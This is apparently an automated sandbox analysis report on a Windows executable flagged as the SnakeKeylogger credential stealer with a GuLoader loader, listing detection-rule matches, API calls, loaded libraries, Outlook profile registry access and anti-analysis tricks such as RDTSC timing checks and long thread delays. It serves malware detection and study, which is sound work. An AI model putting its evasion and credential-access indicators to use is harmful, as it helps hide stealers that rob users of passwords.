                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, -A-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/5@5/5
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberryJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile created: C:\Users\user\AppData\Local\Temp\nsj84F3.tmpJump to behavior
                    Source: MC8017774DOCS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003416B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003412B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003415E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003411B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000034139000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: MC8017774DOCS.exeReversingLabs: Detection: 42%
                    Source: MC8017774DOCS.exeVirustotal: Detection: 48%
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile read: C:\Users\user\Desktop\MC8017774DOCS.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: MC8017774DOCS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected GuLoader
                    Source: Yara matchFile source: 00000000.00000002.2522664351.00000000037E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MC8017774DOCS.exe PID: 7084, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E9B1B63
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_6E9B2FD0 push eax; ret 0_2_6E9B2FFE
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeFile created: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeAPI/Special instruction interceptor: Address: 38283BF
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeAPI/Special instruction interceptor: Address: 21F83BF
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeRDTSC instruction interceptor: First address: 37BE195 second address: 37BE195 instructions: 0x00000000 rdtsc 0x00000002 test cl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F56CC73E051h 0x00000008 test ch, dh 0x0000000a test bx, dx 0x0000000d inc ebp 0x0000000e cmp ecx, eax 0x00000010 inc ebx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeRDTSC instruction interceptor: First address: 218E195 second address: 218E195 instructions: 0x00000000 rdtsc 0x00000002 test cl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F56CD2809B1h 0x00000008 test ch, dh 0x0000000a test bx, dx 0x0000000d inc ebp 0x0000000e cmp ecx, eax 0x00000010 inc ebx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeMemory allocated: 33AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeMemory allocated: 33D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeMemory allocated: 33B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598952Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598609Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598500Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598389Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598281Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598172Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597828Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597719Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597594Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597266Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597047Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596813Jump to behavior
